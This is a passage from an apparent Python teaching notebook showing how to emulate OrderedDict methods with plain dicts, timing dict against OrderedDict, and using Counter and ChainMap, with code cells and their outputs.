This is of course not iteal since we have to make a copy of all the keys into a list first - not very efficient. So, we should probably wait for Python 3.8 :-)

#### Popping Items

Next let's look at `popitem` - we need to be able to pop either the first or the last element.

To do this, we really need to be able to determine the *first* and *last* key in the dictionary - again, this is not something we currently have natively in plain dictionaries, so we need to calculate them ourselves.

Getting the first key is not difficult - we simply retrieve the first key from the keys() view for example:

In [45]:
first_key = next(iter(d2.keys()))
print(d2)
print(first_key)

{'a': 1, 'b': 2, 'c': 3, 'd': 4}
a


Fiding the last key is a bit more challenging, but fortunately, we can just use the `popitem` method on plain dictionaries that is guaranteed to pop the last insert item - again, this is a guarantee only in Python 3.7 and above:

In [46]:
d1 = OrderedDict(a=1, b=2, c=3, d=4)
d2 = dict(a=1, b=2, c=3, d=4)

print(d2)
print(d2.popitem())
print(d2)

{'a': 1, 'b': 2, 'c': 3, 'd': 4}
('d', 4)
{'a': 1, 'b': 2, 'c': 3}


So we could combine these into a custom function as follows:

In [47]:
def popitem(d, last=True):
    if last:
        return d.popitem()
    else:
        first_key = next(iter(d.keys()))
        return first_key, d.pop(first_key)

In [48]:
d2 = dict(a=1, b=2, c=3, d=4)
print(d2)
print(popitem(d2))
print(d2)

{'a': 1, 'b': 2, 'c': 3, 'd': 4}
('d', 4)
{'a': 1, 'b': 2, 'c': 3}


In [33]:
d2 = dict(a=1, b=2, c=3, d=4)
print(d2)
print(popitem(d2, last=False))
print(d2)

{'a': 1, 'b': 2, 'c': 3, 'd': 4}
('a', 1)
{'b': 2, 'c': 3, 'd': 4}


#### Move to End

Next let's look at the `move_to_end` method, which can move any key to either the beginning or the end of the dictionary.

Moving a key to the end of the dictionary is easy - we simply pop the item, and insert it again - because of the gauranteed insertion order, this means the key will now be placed at the end of the dictionary:

In [36]:
d2 = dict(a=1, b=2, c=3, d=4)
print(d2)
key = 'b'
d2[key] = d2.pop(key)
print(d2)

{'a': 1, 'b': 2, 'c': 3, 'd': 4}
{'a': 1, 'c': 3, 'd': 4, 'b': 2}


Moving to the beginning however is not as easy - the only way I could think of was to take the desired key and moving it to the end first. Then, take every key preceding it, and pop them off and add them back to the dictionary one by one, until, but not including the target key we wanted to move to the beginning of the dictionary.

In other words something like this:

```a b c d e f```

To move `c` to the front, first pop it and add it to the dictionary:
``` a b d e f c```

Now we do the same thing to every key preceding `c`, essentially moving each key one by one to the end of the dictionary:

```b d e f c a```

```d e f c a b```

```e f c a b d```

```f c a b d e```

```c a b d e f```

We can code it this way:

In [50]:
d = dict(a=1, b=2, c=3, d=4, e=5, f=6)
key = 'c'

print(d.keys())

# first move desired key to end
d[key] = d.pop(key)  
print(d.keys())

keys = list(d.keys())[:-1]
for key in keys:
    d[key] = d.pop(key)
    print(d.keys())
    
print(d)

dict_keys(['a', 'b', 'c', 'd', 'e', 'f'])
dict_keys(['a', 'b', 'd', 'e', 'f', 'c'])
dict_keys(['b', 'd', 'e', 'f', 'c', 'a'])
dict_keys(['d', 'e', 'f', 'c', 'a', 'b'])
dict_keys(['e', 'f', 'c', 'a', 'b', 'd'])
dict_keys(['f', 'c', 'a', 'b', 'd', 'e'])
dict_keys(['c', 'a', 'b', 'd', 'e', 'f'])
{'c': 3, 'a': 1, 'b': 2, 'd': 4, 'e': 5, 'f': 6}


We can combine both into a single function:

In [51]:
def move_to_end(d, key, *, last=True):
    d[key] = d.pop(key)
    
    if not last:
        for key in list(d.keys())[:-1]:
            d[key] = d.pop(key)       

In [52]:
d = dict(a=1, b=2, c=3, d=4, e=5, f=6)

In [53]:
move_to_end(d, 'c')
print(d)

{'a': 1, 'b': 2, 'd': 4, 'e': 5, 'f': 6, 'c': 3}


In [46]:
move_to_end(d, 'c', last=False)
print(d)

{'c': 2, 'a': 1, 'b': 2, 'd': 3, 'e': 4, 'f': 5}


#### Equality Comparison

Lastly let's look at equality (`==`) comparisons.
Even though Python 3.6+ guarantees key ordering based on the insertion order, two dictionaries with the same key/values but in different order will compare equal, but not so with `OrderedDict`.

To achieve the same type of "key-order-sensitive" comparison we therefore need to make sure of two things:
1. the dictionaries are equal - i.e. have the same key/value pairs
2. the order of the keys is the same in both dictionaries

We can easily achieve this comparing the dictionaries and the `keys()` views to make sure they are equal:

In [1]:
d1 = {'a': 10, 'b': 20, 'c': 30}
d2 = {'b': 20, 'c': 30, 'a': 10}

In [2]:
d1 == d2

True

Now just comparing the `keys()` views will not work:

In [4]:
d1.keys() == d2.keys()

True

Remember that the `keys()` view behaves like a `set`, so comparisons will be `True` as long as the same elements (keys) are present in both sets - but ordering does not matter.

Instead, we can materialize these views as lists, and then compare the lists:

In [5]:
list(d1.keys()) == list(d2.keys())

False

So to test for "key-order-sensitive" equality, we can simply do this:

In [6]:
d1 == d2 and list(d1.keys()) == list(d2.keys())

False

Of course, materializing the lists incurs some overhead, so instead we could use iteration through both key views and make sure each corresponding key is equal.

There are a number of ways to do this, here I'm going to use `zip` to do it:

In [7]:
def dict_equal_sensitive(d1, d2):
    if d1 == d2:
        for k1, k2 in zip(d1.keys(), d2.keys()):
            if k1 != k2:
                return False
        return True
    else:
        return False

In [8]:
dict_equal_sensitive(d1, d2)

False

In [9]:
dict_equal_sensitive(d1, d1)

True

If you want a pure functional programming approach that does not use a loop, we can do it this way too, using `all` and `map`:

In [28]:
def dict_equal_sensitive(d1, d2):
    if d1 == d2:
        return all(map(lambda el: el[0] == el[1], 
                       zip(d1.keys(), d2.keys())
                      )
                  )
    else:
        return False

In [36]:
dict_equal_sensitive(d1, d2)

False

In [37]:
dict_equal_sensitive(d1, d1)

True

So, we can perform all these operations on a standard dictionary, but it is a lot more work to do so - for now I would stick to using an `OrderedDict` when I need those specific methods beyond just a guaranteed key order. If the guaranteed key order is all I need, then a plain `dict` will work just fine.

#### Timings

What about timings?

Let's look at a few timings to see the performance difference between plain `dicts` and `OrderedDicts`.

In [54]:
from timeit import timeit

In [55]:
def create_dict(n=100):
    d = dict()
    for i in range(n):
        d[i] = i
    return d

In [56]:
def create_ordered_dict(n=100):
    d = OrderedDict()
    for i in range(n):
        d[i] = i
    return d

In [58]:
timeit('create_dict(10_000)', globals=globals(), number=1_000)

0.46366495298570953

In [59]:
timeit('create_ordered_dict(10_000)', globals=globals(), number=1_000)

0.718640872015385

As you can see, creating an OrderedDict has slightly more overhead.

Let's see if recovering a key from an `OrderedDict` is slower than a plain `dict`:

In [60]:
d1 = create_dict(10_000)
d2 = create_ordered_dict(10_000)

timeit('d1[9_999]', globals=globals(), number=100_000)

0.005689098994480446

In [61]:
timeit('d2[9_999]', globals=globals(), number=100_000)

0.005895093985600397

So no significant difference between these two.


Let's see how pop (first and last) differs:

In [64]:
n = 1_000_000
d1 = create_dict(n)
timeit('d1.popitem()', globals = globals(), number=n)

0.06503099398105405

In [66]:
n = 1_000_000
d2 = create_ordered_dict(n)
timeit('d2.popitem(last=True)', globals = globals(), number=n)

0.26186515000881627

Perhaps not surprisingly, the built-in `dict` is substantially faster at popping the last item of the dictionary.

What about popping the first item?

In [70]:
n = 100_000
d1 = create_dict(n)
timeit('popitem(d1, last=False)', globals = globals(), number=n)

2.9098294480063487

In [71]:
n = 100_000
d2 = create_ordered_dict(n)
timeit('d2.popitem(last=False)', globals = globals(), number=n)

0.038049360999139026

As you can see, substantially faster in an `OrderedDict`.

You can try the other methods (`move_to_end` and equality testing) yourself - if you do, please post your results in the **Q&A** section!
Or maybe you can come up with more efficient alternatives to what we have here for pop, move, etc.

##  Counter

The `Counter` dictionary is one that specializes for helping with, you guessed it, counters!

Actually we used a `defaultdict` earlier to do something similar:

In [1]:
from collections import defaultdict, Counter

Let's say we want to count the frequency of each character in a string:

In [2]:
sentence = 'the quick brown fox jumps over the lazy dog'

In [3]:
counter = defaultdict(int)

In [4]:
for c in sentence:
    counter[c] += 1

In [5]:
counter

defaultdict(int,
            {'t': 2,
             'h': 2,
             'e': 3,
             ' ': 8,
             'q': 1,
             'u': 2,
             'i': 1,
             'c': 1,
             'k': 1,
             'b': 1,
             'r': 2,
             'o': 4,
             'w': 1,
             'n': 1,
             'f': 1,
             'x': 1,
             'j': 1,
             'm': 1,
             'p': 1,
             's': 1,
             'v': 1,
             'l': 1,
             'a': 1,
             'z': 1,
             'y': 1,
             'd': 1,
             'g': 1})

We can do the same thing using a `Counter` - unlike the `defaultdict` we don't specify a default factory - it's always zero (it's a counter after all):

In [6]:
counter = Counter()
for c in sentence:
    counter[c] += 1

In [7]:
counter

Counter({'t': 2,
         'h': 2,
         'e': 3,
         ' ': 8,
         'q': 1,
         'u': 2,
         'i': 1,
         'c': 1,
         'k': 1,
         'b': 1,
         'r': 2,
         'o': 4,
         'w': 1,
         'n': 1,
         'f': 1,
         'x': 1,
         'j': 1,
         'm': 1,
         'p': 1,
         's': 1,
         'v': 1,
         'l': 1,
         'a': 1,
         'z': 1,
         'y': 1,
         'd': 1,
         'g': 1})

OK, so if that's all there was to `Counter` it would be pretty odd to have a data structure different than `OrderedDict`.

But `Counter` has a slew of additional methods which make sense in the context of counters:

1. Iterate through all the elements of counters, but repeat the elements as many times as their frequency
2. Find the `n` most common (by frequency) elements
3. Decrement the counters based on another `Counter` (or iterable)
4. Increment the counters based on another `Counter` (or iterable)
5. Specialized constructor for additional flexibility

If you are familiar with multisets, then this is essentially a data structure that can be used for multisets.

#### Constructor

It is so common to create a frequency distribution of elements in an iterable, that this is supported automatically:

In [8]:
c1 = Counter('able was I ere I saw elba')
c1

Counter({'a': 4,
         'b': 2,
         'l': 2,
         'e': 4,
         ' ': 6,
         'w': 2,
         's': 2,
         'I': 2,
         'r': 1})

Of course this works for iterables in general, not just strings:

In [9]:
import random

In [10]:
random.seed(0)

In [11]:
my_list = [random.randint(0, 10) for _ in range(1_000)]

In [12]:
c2 = Counter(my_list)

In [13]:
c2

Counter({6: 95,
         0: 97,
         4: 91,
         8: 76,
         7: 94,
         5: 89,
         9: 85,
         3: 80,
         2: 88,
         1: 107,
         10: 98})

We can also initialize a `Counter` object by passing in keyword arguments, or even a dictionary:

In [14]:
c2 = Counter(a=1, b=10)
c2

Counter({'a': 1, 'b': 10})

In [15]:
c3 = Counter({'a': 1, 'b': 10})
c3

Counter({'a': 1, 'b': 10})

Technically we can store values other than integers in a `Counter` object - it's possible but of limited use since the default is still `0` irrespective of what other values are contained in the object.

#### Finding the n most Common Elements

Let's find the `n` most common words (by frequency) in a paragraph of text. Words are considered delimited by white space or punctuation marks such as `.`, `,`, `!`, etc - basically anything except a character or a digit.
This is actually quite difficult to do, so we'll use a close enough approximation that will cover most cases just fine, using a regular expression:

In [16]:
import re

In [17]:
sentence = '''
his module implements pseudo-random number generators for various distributions.

For integers, there is uniform selection from a range. For sequences, there is uniform selection of a random element, a function to generate a random permutation of a list in-place, and a function for random sampling without replacement.

On the real line, there are functions to compute uniform, normal (Gaussian), lognormal, negative exponential, gamma, and beta distributions. For generating distributions of angles, the von Mises distribution is available.

Almost all module functions depend on the basic function random(), which generates a random float uniformly in the semi-open range [0.0, 1.0). Python uses the Mersenne Twister as the core generator. It produces 53-bit precision floats and has a period of 2**19937-1. The underlying implementation in C is both fast and threadsafe. The Mersenne Twister is one of the most extensively tested random number generators in existence. However, being completely deterministic, it is not suitable for all purposes, and is completely unsuitable for cryptographic purposes.'''

In [18]:
words = re.split('\W', sentence)

In [19]:
words

['',
 'his',
 'module',
 'implements',
 'pseudo',
 'random',
 'number',
 'generators',
 'for',
 'various',
 'distributions',
 '',
 '',
 'For',
 'integers',
 '',
 'there',
 'is',
 'uniform',
 'selection',
 'from',
 'a',
 'range',
 '',
 'For',
 'sequences',
 '',
 'there',
 'is',
 'uniform',
 'selection',
 'of',
 'a',
 'random',
 'element',
 '',
 'a',
 'function',
 'to',
 'generate',
 'a',
 'random',
 'permutation',
 'of',
 'a',
 'list',
 'in',
 'place',
 '',
 'and',
 'a',
 'function',
 'for',
 'random',
 'sampling',
 'without',
 'replacement',
 '',
 '',
 'On',
 'the',
 'real',
 'line',
 '',
 'there',
 'are',
 'functions',
 'to',
 'compute',
 'uniform',
 '',
 'normal',
 '',
 'Gaussian',
 '',
 '',
 'lognormal',
 '',
 'negative',
 'exponential',
 '',
 'gamma',
 '',
 'and',
 'beta',
 'distributions',
 '',
 'For',
 'generating',
 'distributions',
 'of',
 'angles',
 '',
 'the',
 'von',
 'Mises',
 'distribution',
 'is',
 'available',
 '',
 '',
 'Almost',
 'all',
 'module',
 'functions',
 'depen

But what are the frequencies of each word, and what are the 5 most frequent words?

In [20]:
word_count = Counter(words)

In [21]:
word_count

Counter({'': 38,
         'his': 1,
         'module': 2,
         'implements': 1,
         'pseudo': 1,
         'random': 7,
         'number': 2,
         'generators': 2,
         'for': 4,
         'various': 1,
         'distributions': 3,
         'For': 3,
         'integers': 1,
         'there': 3,
         'is': 7,
         'uniform': 3,
         'selection': 2,
         'from': 1,
         'a': 8,
         'range': 2,
         'sequences': 1,
         'of': 5,
         'element': 1,
         'function': 3,
         'to': 2,
         'generate': 1,
         'permutation': 1,
         'list': 1,
         'in': 4,
         'place': 1,
         'and': 5,
         'sampling': 1,
         'without': 1,
         'replacement': 1,
         'On': 1,
         'the': 7,
         'real': 1,
         'line': 1,
         'are': 1,
         'functions': 2,
         'compute': 1,
         'normal': 1,
         'Gaussian': 1,
         'lognormal': 1,
         'negative': 1,
         'expon

In [22]:
word_count.most_common(5)

[('', 38), ('a', 8), ('random', 7), ('is', 7), ('the', 7)]

#### Using Repeated Iteration

In [23]:
c1 = Counter('abba')
c1

Counter({'a': 2, 'b': 2})

In [24]:
for c in c1:
    print(c)

a
b


However, we can have an iteration that repeats the counter keys as many times as the indicated frequency:

In [25]:
for c in c1.elements():
    print(c)

a
a
b
b


What's interesting about this functionality is that we can turn this around and use it as a way to create an iterable that has repeating elements.

Suppose we want to to iterate through a list of (integer) numbers that are each repeated as many times as the number itself.

For example 1 should repeat once, 2 should repeat twice, and so on.

This is actually not that easy to do!

Here's one possible way to do it:

In [26]:
l = []
for i in range(1, 11):
    for _ in range(i):
        l.append(i)
print(l)

[1, 2, 2, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 5, 6, 6, 6, 6, 6, 6, 7, 7, 7, 7, 7, 7, 7, 8, 8, 8, 8, 8, 8, 8, 8, 9, 9, 9, 9, 9, 9, 9, 9, 9, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10]


But we could use a `Counter` object as well:

In [27]:
c1 = Counter()
for i in range(1, 11):
    c1[i] = i

In [28]:
c1

Counter({1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 6: 6, 7: 7, 8: 8, 9: 9, 10: 10})

In [29]:
print(c1.elements())

<itertools.chain object at 0x1047aa518>


So you'll notice that we have a `chain` object here. That's one big advantage to using the `Counter` object - the repeated iterable does not actually exist as list like our previous implementation - this is a lazy iterable, so this is far more memory efficient.

And we can iterate through that `chain` quite easily:

In [30]:
for i in c1.elements():
    print(i, end=', ')

1, 2, 2, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 5, 6, 6, 6, 6, 6, 6, 7, 7, 7, 7, 7, 7, 7, 8, 8, 8, 8, 8, 8, 8, 8, 9, 9, 9, 9, 9, 9, 9, 9, 9, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 

Just for fun, how could we reproduce this functionality using a plain dictionary?

In [31]:
class RepeatIterable:
    def __init__(self, **kwargs):
        self.d = kwargs
        
    def __setitem__(self, key, value):
        self.d[key] = value
        
    def __getitem__(self, key):
        self.d[key] = self.d.get(key, 0)
        return self.d[key]

In [32]:
r = RepeatIterable(x=10, y=20)

In [33]:
r.d

{'x': 10, 'y': 20}

In [34]:
r['a'] = 100

In [35]:
r['a']

100

In [36]:
r['b']

0

In [37]:
r.d

{'x': 10, 'y': 20, 'a': 100, 'b': 0}

Now we have to implement that `elements` iterator:

In [38]:
class RepeatIterable:
    def __init__(self, **kwargs):
        self.d = kwargs
        
    def __setitem__(self, key, value):
        self.d[key] = value
        
    def __getitem__(self, key):
        self.d[key] = self.d.get(key, 0)
        return self.d[key]
    
    def elements(self):
        for k, frequency in self.d.items():
            for i in range(frequency):
                yield k

In [39]:
r = RepeatIterable(a=2, b=3, c=1)

In [40]:
for e in r.elements():
    print(e, end=', ')

a, a, b, b, b, c, 

#### Updating from another Iterable or Counter

Lastly let's see how we can update a `Counter` object using another `Counter` object. 

When both objects have the same key, we have a choice - do we add the count of one to the count of the other, or do we subtract them?

We can do either, by using the `update` (additive) or `subtract` methods.

In [41]:
c1 = Counter(a=1, b=2, c=3)
c2 = Counter(b=1, c=2, d=3)

c1.update(c2)
print(c1)

Counter({'c': 5, 'b': 3, 'd': 3, 'a': 1})


On the other hand we can subtract instead of add counters:

In [42]:
c1 = Counter(a=1, b=2, c=3)
c2 = Counter(b=1, c=2, d=3)

c1.subtract(c2)
print(c1)

Counter({'a': 1, 'b': 1, 'c': 1, 'd': -3})


Notice the key `d` - since `Counters` default missing keys to `0`, when `d: 3` in `c2` was subtracted from `c1`, the counter for `d` was defaulted to `0`.

Just as the constructor for a `Counter` can take different arguments, so too can the `update` and `subtract` methods.

In [43]:
c1 = Counter('aabbccddee')
print(c1)
c1.update('abcdef')
print(c1)

Counter({'a': 2, 'b': 2, 'c': 2, 'd': 2, 'e': 2})
Counter({'a': 3, 'b': 3, 'c': 3, 'd': 3, 'e': 3, 'f': 1})


#### Mathematical Operations

These `Counter` objects also support several other mathematical operations when both operands are `Counter` objects. In all these cases the result is a new `Counter` object.

* `+`: same as `update`, but returns a new `Counter` object instead of an in-place update.
* `-`: subtracts one counter from another, but discards zero and negative values
* `&`: keeps the **minimum** of the key values
* `|`: keeps the **maximum** of the key values

In [44]:
c1 = Counter('aabbcc')
c2 = Counter('abc')
c1 + c2

Counter({'a': 3, 'b': 3, 'c': 3})

In [45]:
c1 - c2

Counter({'a': 1, 'b': 1, 'c': 1})

In [46]:
c1 = Counter(a=5, b=1)
c2 = Counter(a=1, b=10)

c1 & c2

Counter({'a': 1, 'b': 1})

In [47]:
c1 | c2

Counter({'a': 5, 'b': 10})

The **unary** `+` can also be used to remove any non-positive count from the Counter:

In [48]:
c1 = Counter(a=10, b=-10)
+c1

Counter({'a': 10})

The **unary** `-` changes the sign of each counter, and removes any non-positive result:

In [49]:
-c1

Counter({'b': 10})

##### Example

Let's assume you are working for a company that produces different kinds of widgets.
You are asked to identify the top 3 best selling widgets.

You have two separate data sources - one data source can give you a history of all widget orders (widget name, quantity), while another data source can give you a history of widget refunds (widget name, quantity refunded).

From these two data sources, you need to determine the top selling widgets (taking refinds into account of course).

Let's simulate both of these lists:

In [50]:
import random
random.seed(0)

widgets = ['battery', 'charger', 'cable', 'case', 'keyboard', 'mouse']

orders = [(random.choice(widgets), random.randint(1, 5)) for _ in range(100)]
refunds = [(random.choice(widgets), random.randint(1, 3)) for _ in range(20)]

In [51]:
orders

[('case', 4),
 ('battery', 3),
 ('keyboard', 4),
 ('case', 3),
 ('case', 3),
 ('keyboard', 2),
 ('keyboard', 2),
 ('cable', 2),
 ('battery', 5),
 ('cable', 5),
 ('mouse', 5),
 ('charger', 3),
 ('battery', 1),
 ('mouse', 3),
 ('case', 5),
 ('battery', 3),
 ('case', 3),
 ('keyboard', 2),
 ('keyboard', 4),
 ('case', 5),
 ('cable', 1),
 ('keyboard', 1),
 ('battery', 4),
 ('mouse', 1),
 ('keyboard', 4),
 ('cable', 2),
 ('mouse', 3),
 ('mouse', 1),
 ('charger', 5),
 ('charger', 2),
 ('charger', 5),
 ('case', 1),
 ('battery', 3),
 ('keyboard', 4),
 ('battery', 3),
 ('keyboard', 3),
 ('mouse', 1),
 ('keyboard', 3),
 ('keyboard', 2),
 ('keyboard', 5),
 ('keyboard', 3),
 ('case', 1),
 ('keyboard', 4),
 ('cable', 5),
 ('charger', 3),
 ('charger', 2),
 ('charger', 1),
 ('keyboard', 3),
 ('case', 1),
 ('battery', 2),
 ('charger', 1),
 ('battery', 5),
 ('mouse', 4),
 ('mouse', 5),
 ('cable', 5),
 ('charger', 2),
 ('mouse', 5),
 ('case', 5),
 ('cable', 4),
 ('case', 3),
 ('battery', 3),
 ('keyboard',

In [52]:
refunds

[('battery', 3),
 ('charger', 1),
 ('cable', 3),
 ('cable', 1),
 ('keyboard', 2),
 ('mouse', 1),
 ('battery', 2),
 ('mouse', 2),
 ('keyboard', 3),
 ('cable', 3),
 ('cable', 2),
 ('mouse', 2),
 ('charger', 3),
 ('mouse', 1),
 ('case', 3),
 ('battery', 2),
 ('mouse', 1),
 ('keyboard', 2),
 ('charger', 1),
 ('case', 2)]

Let's first load these up into counter objects.

To do this we're going to iterate through the various lists and update our counters:

In [53]:
sold_counter = Counter()
refund_counter = Counter()

for order in orders:
    sold_counter[order[0]] += order[1]

for refund in refunds:
    refund_counter[refund[0]] += refund[1]

In [54]:
sold_counter

Counter({'case': 41,
         'battery': 61,
         'keyboard': 65,
         'cable': 39,
         'mouse': 46,
         'charger': 35})

In [55]:
refund_counter

Counter({'battery': 7,
         'charger': 5,
         'cable': 9,
         'keyboard': 7,
         'mouse': 7,
         'case': 5})

In [56]:
net_counter = sold_counter - refund_counter

In [57]:
net_counter

Counter({'case': 36,
         'battery': 54,
         'keyboard': 58,
         'cable': 30,
         'mouse': 39,
         'charger': 30})

In [58]:
net_counter.most_common(3)

[('keyboard', 58), ('battery', 54), ('mouse', 39)]

We could actually do this a little differently, not using loops to populate our initial counters.

Recall the `repeat()` function in `itertools`:

In [59]:
from itertools import repeat

In [60]:
list(repeat('battery', 5))

['battery', 'battery', 'battery', 'battery', 'battery']

In [61]:
orders[0]

('case', 4)

In [62]:
list(repeat(*orders[0]))

['case', 'case', 'case', 'case']

So we could use the `repeat()` method to essentially repeat each widget for each item of `orders`. We need to chain this up for each element of `orders` - this will give us a single iterable that we can then use in the constructor for a `Counter` object. We can do this using a generator expression for example:

In [63]:
from itertools import chain

In [64]:
list(chain.from_iterable(repeat(*order) for order in orders))

['case',
 'case',
 'case',
 'case',
 'battery',
 'battery',
 'battery',
 'keyboard',
 'keyboard',
 'keyboard',
 'keyboard',
 'case',
 'case',
 'case',
 'case',
 'case',
 'case',
 'keyboard',
 'keyboard',
 'keyboard',
 'keyboard',
 'cable',
 'cable',
 'battery',
 'battery',
 'battery',
 'battery',
 'battery',
 'cable',
 'cable',
 'cable',
 'cable',
 'cable',
 'mouse',
 'mouse',
 'mouse',
 'mouse',
 'mouse',
 'charger',
 'charger',
 'charger',
 'battery',
 'mouse',
 'mouse',
 'mouse',
 'case',
 'case',
 'case',
 'case',
 'case',
 'battery',
 'battery',
 'battery',
 'case',
 'case',
 'case',
 'keyboard',
 'keyboard',
 'keyboard',
 'keyboard',
 'keyboard',
 'keyboard',
 'case',
 'case',
 'case',
 'case',
 'case',
 'cable',
 'keyboard',
 'battery',
 'battery',
 'battery',
 'battery',
 'mouse',
 'keyboard',
 'keyboard',
 'keyboard',
 'keyboard',
 'cable',
 'cable',
 'mouse',
 'mouse',
 'mouse',
 'mouse',
 'charger',
 'charger',
 'charger',
 'charger',
 'charger',
 'charger',
 'charger',
 'ch

In [65]:
order_counter = Counter(chain.from_iterable(repeat(*order) for order in orders))

In [66]:
order_counter

Counter({'case': 41,
         'battery': 61,
         'keyboard': 65,
         'cable': 39,
         'mouse': 46,
         'charger': 35})

What if we don't want to use a `Counter` object.
We can still do it (relatively easily) as follows:

In [67]:
net_sales = {}
for order in orders:
    key = order[0]
    cnt = order[1]
    net_sales[key] = net_sales.get(key, 0) + cnt
    
for refund in refunds:
    key = refund[0]
    cnt = refund[1]
    net_sales[key] = net_sales.get(key, 0) - cnt

# eliminate non-positive values (to mimic what - does for Counters)
net_sales = {k: v for k, v in net_sales.items() if v > 0}

# we now have to sort the dictionary
# this means sorting the keys based on the values
sorted_net_sales = sorted(net_sales.items(), key=lambda t: t[1], reverse=True)

# Top three
sorted_net_sales[:3]

[('keyboard', 58), ('battery', 54), ('mouse', 39)]

##  ChainMap

Remember the `chain` function in the `itertools` module? That allowed us to chain multiple iterables together to look like a single iterable.

The `ChainMap` in the `collections` module is somewhat similar - it allows us to chain multiple dictionaries (mapping types more generally) so it looks like a single mapping type.
But there are some wrinkles: 
* when we request a key lookup, what happens if the same key occurs in more than one dictionary?
* we can actually update, insert and delete elements from a ChainMap - how does that work?

Let's look at some simple examples where we do not have key collisions first:

In [1]:
d1 = {'a': 1, 'b': 2}
d2 = {'c': 3, 'd': 4}
d3 = {'e': 5, 'f': 6}

Now we can always create a new dictionary that contains all those keys by using unpacking, or even starting with an empty dictionary and updating it three times with each of the dicts `d1, d2` and `d3`:

In [2]:
d = {**d1, **d2, **d3}

In [3]:
print(d)

{'a': 1, 'b': 2, 'c': 3, 'd': 4, 'e': 5, 'f': 6}


or:

In [4]:
d = {}
d.update(d1)
d.update(d2)
d.update(d3)

In [5]:
print(d)

{'a': 1, 'b': 2, 'c': 3, 'd': 4, 'e': 5, 'f': 6}


But in a way this is wasteful because we had to copy the data into a new dictionary.

Instead we can use `ChainMap`:

In [6]:
from collections import ChainMap

In [7]:
d1 = {'a': 1, 'b': 2}
d2 = {'c': 3, 'd': 4}
d3 = {'e': 5, 'f': 6}
d = ChainMap(d1, d2, d3)

In [8]:
print(d)

ChainMap({'a': 1, 'b': 2}, {'c': 3, 'd': 4}, {'e': 5, 'f': 6})


In [9]:
isinstance(d, dict)

False

So, the result is not a dictionary, but it is a mapping type that we can use almost **like** a dictionary:

In [10]:
d['a']

1

In [11]:
d['c']

3

In [12]:
for k, v in d.items():
    print(k, v)

d 4
c 3
f 6
b 2
a 1
e 5


**Note** that the iteration order here, unlike a regular Python dictionary, is **not** guaranteed!

Now what happens if we have key 'collisions'?

In [13]:
d1 = {'a': 1, 'b': 2}
d2 = {'b': 20, 'c': 3}
d3 = {'c': 30, 'd': 4}

In [14]:
d = ChainMap(d1, d2, d3)

In [15]:
d['b']

2

In [16]:
d['c']

3

As you can see, the value returned corresponds to the the value of the **first** key found in the chain. (So note the difference between this and when we unpack the dictionaries into a new dictionary, where the "last" key effectively overwrite any "previous" key.)

In fact, if we iterate through all the items, you'll notice that, as we would expect from a mapping type, we do not have duplicate keys, and moreover the associated value is the **first** one encountered in the chain:

In [17]:
for k, v in d.items():
    print(k, v)

d 4
c 3
b 2
a 1


Now let's look at how ChainMap objects handle inserts, deletes and updates:

In [18]:
d1 = {'a': 1, 'b': 2}
d2 = {'c': 3, 'd': 4}
d3 = {'e': 5, 'f': 6}
d = ChainMap(d1, d2, d3)

In [19]:
d['z'] = 100

In [20]:
print(d)

ChainMap({'a': 1, 'b': 2, 'z': 100}, {'c': 3, 'd': 4}, {'e': 5, 'f': 6})


As you can see the element `'z': 100` was added to the chain map. But what about the underlying dictionaries that make up the map?

In [21]:
print(d1)
print(d2)
print(d3)

{'a': 1, 'b': 2, 'z': 100}
{'c': 3, 'd': 4}
{'e': 5, 'f': 6}


When mutating a chain map, the **first** dictionary in the chain is used to handle the mutation - even updates:

Let's try to update `c`, which is in the second dictionary:

In [22]:
d['c'] = 300

In [23]:
print(d)

ChainMap({'a': 1, 'b': 2, 'z': 100, 'c': 300}, {'c': 3, 'd': 4}, {'e': 5, 'f': 6})


As you can see the **first** dictionary in the chain was "updated" - since the key did not exist, the key with the "updated" value was added to the underlying dictionary:

In [24]:
print(d1)
print(d2)
print(d3)

{'a': 1, 'b': 2, 'z': 100, 'c': 300}
{'c': 3, 'd': 4}
{'e': 5, 'f': 6}


As you can see, a **new** element `c` was created in the **first** dict in the chain. When we view it from the chain map perspective, it looks like `c` was updated because it was actually inserted in the first dict, so that key is encountered in that dict first, and hence that new value is used.

What about deleting an item?

In [25]:
d1 = {'a': 1, 'b': 2}
d2 = {'c': 3, 'd': 4}
d3 = {'e': 5, 'f': 6}
d = ChainMap(d1, d2, d3)

In [26]:
del d['a']

In [27]:
list(d.items())

[('d', 4), ('f', 6), ('b', 2), ('c', 3), ('e', 5)]

In [28]:
print(d1)
print(d2)
print(d3)

{'b': 2}
{'c': 3, 'd': 4}
{'e': 5, 'f': 6}


As you can see `a` was deleted from the first dict.

Something important to note here when deleting keys, is that deleting a key does not guarantee the key no longer exists in the chain! It could exist in one of the parents, and only the child is affected:

In [29]:
d1 = {'a': 1, 'b': 2}
d2 = {'a': 100}
d = ChainMap(d1, d2)

In [30]:
d['a']

1

In [31]:
del d['a']

In [32]:
d['a']

100

Since we can only mutate the **first** dict in the chain, trying to delete an item that is present in the chain, but not in the child will cause an exception:

In [33]:
del d['c']

KeyError: "Key not found in the first mapping: 'c'"

A `ChainMap` is built as a view on top of a sequence of mappings, and those maps are incorporated **by reference**.
This means that if an underlying map is mutated, then the `ChainMap` instance will **see** the change:

In [34]:
d1 = {'a': 1, 'b': 2}
d2 = {'c': 3, 'd': 4}
d3 = {'e': 5, 'f': 6}
d = ChainMap(d1, d2, d3)

In [35]:
list(d.items())

[('d', 4), ('c', 3), ('f', 6), ('b', 2), ('a', 1), ('e', 5)]

In [36]:
d3['g'] = 7

In [37]:
list(d.items())

[('d', 4), ('g', 7), ('c', 3), ('f', 6), ('b', 2), ('a', 1), ('e', 5)]

We can even chain ChainMaps.
For example, we can use this approach to "append" a new dictionary to a chain map, in essence create a **new** chain map containing the maps from one chain map and adding one or more maps to the list:

In [38]:
d1 = {'a': 1, 'b': 2}
d2 = {'c': 3, 'd': 4}
d = ChainMap(d1, d2)

In [39]:
d3 = {'d':400, 'e': 5 }
d = ChainMap(d, d3)

In [40]:
print(d)

ChainMap(ChainMap({'a': 1, 'b': 2}, {'c': 3, 'd': 4}), {'d': 400, 'e': 5})


Of course, we could place `d3` in front:

In [41]:
d1 = {'a': 1, 'b': 2}
d2 = {'c': 3, 'd': 4}
d = ChainMap(d1, d2)

In [42]:
